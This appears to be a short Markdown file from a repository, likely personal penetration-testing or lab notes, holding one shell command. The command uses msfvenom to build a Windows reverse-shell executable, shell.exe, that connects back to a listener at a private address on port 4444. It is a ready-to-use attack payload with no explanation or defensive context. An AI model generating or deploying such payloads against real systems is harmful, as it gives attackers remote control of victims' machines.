Files
2025-11-21 17:17:42 +01:00

7 lines
103 B
Markdown

```sh
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.224 LPORT=4444 -f exe > shell.exe
```